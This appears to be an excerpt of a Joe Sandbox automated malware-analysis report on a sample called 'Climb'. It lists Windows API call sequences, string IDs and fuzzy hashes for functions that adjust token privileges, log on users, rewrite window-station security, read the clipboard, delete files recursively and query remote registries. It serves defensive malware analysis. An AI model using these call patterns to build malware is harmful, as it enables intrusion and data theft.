                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: a6b0157bf060acaefd4d3c4ffa456410732655ad1ce91fff3533857a4c3cb431
                                                                                                                                                                      • Instruction ID: 548e401131136b9da470077e7f73baca8dced466b3e50294fa16d30fdb2fb7b6
                                                                                                                                                                      • Opcode Fuzzy Hash: a6b0157bf060acaefd4d3c4ffa456410732655ad1ce91fff3533857a4c3cb431
                                                                                                                                                                      • Instruction Fuzzy Hash: 49B0923800060005AD2C0A389A2E9993B5078523B67DC2BC1FC7EA50E1C3398D0FAA60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0055DC54: FindFirstFileW.KERNEL32(?,?), ref: 0055DCCB
                                                                                                                                                                        • Part of subcall function 0055DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DD1B
                                                                                                                                                                        • Part of subcall function 0055DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0055DD2C
                                                                                                                                                                        • Part of subcall function 0055DC54: FindClose.KERNEL32(00000000), ref: 0055DD43
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0056666E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                      • Opcode ID: 53dbabaa8c6c9aab3a87cbf619b262bda54b5b8c34b759bfef03e64d17d5f692
                                                                                                                                                                      • Instruction ID: dc125d1c00237d47a509f251a42d7a1dda7454dcebecf612ebbe54868a8b3be3
                                                                                                                                                                      • Opcode Fuzzy Hash: 53dbabaa8c6c9aab3a87cbf619b262bda54b5b8c34b759bfef03e64d17d5f692
                                                                                                                                                                      • Instruction Fuzzy Hash: 51F05E362001044FDB14AF59D455B6ABBE5AF94765F04844EF9059B352CB74BC01CB95
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00552010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
                                                                                                                                                                        • Part of subcall function 00552010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
                                                                                                                                                                        • Part of subcall function 00552010: GetLastError.KERNEL32 ref: 00552097
                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00551BD2
                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00551BF4
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00551C05
                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00551C1D
                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00551C36
                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00551C40
                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00551C5C
                                                                                                                                                                        • Part of subcall function 00551A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00551B48), ref: 00551A20
                                                                                                                                                                        • Part of subcall function 00551A0B: CloseHandle.KERNEL32(?,?,00551B48), ref: 00551A35
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                      • String ID: $default$winsta0$j[
                                                                                                                                                                      • API String ID: 22674027-3493177619
                                                                                                                                                                      • Opcode ID: 316bf59db12a149e7d8197027213e3face8e34d5de7e59e472b64a21be50af32
                                                                                                                                                                      • Instruction ID: 79c3ee3e8809219bc8e1edd2636bb37f64ccbc2c8373357fb8a43442ee2e0293
                                                                                                                                                                      • Opcode Fuzzy Hash: 316bf59db12a149e7d8197027213e3face8e34d5de7e59e472b64a21be50af32
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A816572A00609ABDF119FA0DC99FEE7FB8FF04305F14402AFD16A61A0D7358949DB64
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
                                                                                                                                                                        • Part of subcall function 00551A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
                                                                                                                                                                        • Part of subcall function 00551A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
                                                                                                                                                                        • Part of subcall function 00551A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
                                                                                                                                                                        • Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99
                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00551518
                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0055154C
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00551563
                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0055159D
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005515B9
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 005515D0
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005515D8
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 005515DF
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00551600
                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00551607
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00551636
                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00551658
                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0055166A
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00551691
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00551698
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005516A1
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005516A8
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005516B1
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005516B8
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005516C4
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005516CB
                                                                                                                                                                        • Part of subcall function 00551ADF: GetProcessHeap.KERNEL32(00000008,005514FD,?,00000000,?,005514FD,?), ref: 00551AED
                                                                                                                                                                        • Part of subcall function 00551ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,005514FD,?), ref: 00551AF4
                                                                                                                                                                        • Part of subcall function 00551ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005514FD,?), ref: 00551B03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                      • Opcode ID: 56504fa69701f1766784b754ce73703665ae1be0faa261e5ec63f64c0fd7a0ba
                                                                                                                                                                      • Instruction ID: aa8c4476cdf48c04e2bef1fb97eb6568c190fcc4c6b0fd5222d7499ba339df4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 56504fa69701f1766784b754ce73703665ae1be0faa261e5ec63f64c0fd7a0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 007168B690060AABDF10DFA5DC48FAEBFB8BF04351F184516ED15A6190E7319A09CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenClipboard.USER32(0058DCD0), ref: 0056F586
                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0056F594
                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0056F5A0
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0056F5AC
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0056F5E4
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0056F5EE
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0056F619
                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0056F626
                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0056F62E
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0056F63F
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0056F67F
                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0056F695
                                                                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 0056F6A1
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0056F6B2
                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0056F6D4
                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0056F6F1
                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0056F72F
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0056F750
                                                                                                                                                                      • CountClipboardFormats.USER32 ref: 0056F771
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0056F7B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 420908878-0
                                                                                                                                                                      • Opcode ID: 23d7d92643ee8619bdfe588dc1dbc8bd2daf62c53965f610735b7ef7fd485e3e
                                                                                                                                                                      • Instruction ID: 64c7d266b0eed84894421754e77ff29832680d9aca584d9b07672e43a2531e89
                                                                                                                                                                      • Opcode Fuzzy Hash: 23d7d92643ee8619bdfe588dc1dbc8bd2daf62c53965f610735b7ef7fd485e3e
                                                                                                                                                                      • Instruction Fuzzy Hash: F161A834204205AFC300EF21E888E3ABBE4FF94358F14446DF946972A2DB31E949DB62
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00567403
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00567457
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00567493
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005674BA
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 005674F7
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00567524
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                      • API String ID: 3830820486-3289030164
                                                                                                                                                                      • Opcode ID: a622b133b380300cb3776efbb0833e844615935cde06be47ee12cd9b98fd5f12
                                                                                                                                                                      • Instruction ID: 4b4d804d7e780456a6b029727b1923b11017c8cac56cc82b892fdda39c687578
                                                                                                                                                                      • Opcode Fuzzy Hash: a622b133b380300cb3776efbb0833e844615935cde06be47ee12cd9b98fd5f12
                                                                                                                                                                      • Instruction Fuzzy Hash: EBD13E71508348AAC710EB65C845EBBB7ECFF98708F44091EF685D7191EB78DA44CBA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0056A0A8
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0056A0E6
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0056A100
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0056A118
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A123
                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0056A13F
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0056A18F
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(005B7B94), ref: 0056A1AD
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0056A1B7
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A1C4
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A1D4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                                      • Opcode ID: c51e252e51ee59d62a331aca1987765179797e53600480bd3c3c6540ec7b9555
                                                                                                                                                                      • Instruction ID: a4a3b27e0b7caa2e32b572c45e08322ab24df6537621d3950b9abf6890645658
                                                                                                                                                                      • Opcode Fuzzy Hash: c51e252e51ee59d62a331aca1987765179797e53600480bd3c3c6540ec7b9555
                                                                                                                                                                      • Instruction Fuzzy Hash: 0631A2316002196BEB14ABA4DC49ADE7BECBF4A360F100595E816F30D0EB74DE85DF65
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00564785
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005647B2
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 005647E2
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00564803
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00564813
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0056489A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005648A5
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005648B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                                                                                      • Opcode ID: 61f927f133052cc419f2d02a8b47d1089239a4aa03ff862c1195083c2e414c07
                                                                                                                                                                      • Instruction ID: 6594a06cda1b530340ad3c4014cf3285fa69dd0a38ee184170c8820d51a5719d
                                                                                                                                                                      • Opcode Fuzzy Hash: 61f927f133052cc419f2d02a8b47d1089239a4aa03ff862c1195083c2e414c07
                                                                                                                                                                      • Instruction Fuzzy Hash: 5331A37550014AABDB209BA0DC49FEB3BBCFF89740F1040B6F909E31A0EB7096459F64
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0056A203
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0056A25E
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A269
                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0056A285
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0056A2D5
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(005B7B94), ref: 0056A2F3
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0056A2FD
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A30A
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0056A31A
                                                                                                                                                                        • Part of subcall function 0055E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0055E3B4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                                      • Opcode ID: 5b892b94bdb99f0f23bf074540be65e4c475205eed70d97f6959da502818606a
                                                                                                                                                                      • Instruction ID: be8209aabe2663f4fb7dd918d83455d2dffc1c95420d5228365854393a427d65
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b892b94bdb99f0f23bf074540be65e4c475205eed70d97f6959da502818606a
                                                                                                                                                                      • Instruction Fuzzy Hash: B831D03564021AAADB10AFA4DC49ADE7BEDBF85324F104591E811B31D0EB31DE898F61
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C99E
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0057CA09
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057CA2D
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0057CA8C
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0057CB47
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CBB4
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CC49
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0057CC9A
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0057CD43
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0057CDE2
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057CDEF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                                      • Opcode ID: 0eb9517eeebbd4b8aa964224a5a58ff2248958d8ac54798433bf470d4d360aeb
                                                                                                                                                                      • Instruction ID: dbfd87bdecaf9752bdb1d4f3a7d3977c871d4c730f98de6f655dcc0be0dda07d
                                                                                                                                                                      • Opcode Fuzzy Hash: 0eb9517eeebbd4b8aa964224a5a58ff2248958d8ac54798433bf470d4d360aeb
                                                                                                                                                                      • Instruction Fuzzy Hash: DB024A71604244AFC714DF24D895A2ABFE5FF89308F18C49DE849DB2A2DB31EC46DB51
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871
                                                                                                                                                                        • Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0055D9CD
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0055DA88
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0055DA9B
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DAB8
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0055DAE2
                                                                                                                                                                        • Part of subcall function 0055DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0055DAC7,?,?), ref: 0055DB5D
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0055DAFE
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0055DB0F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
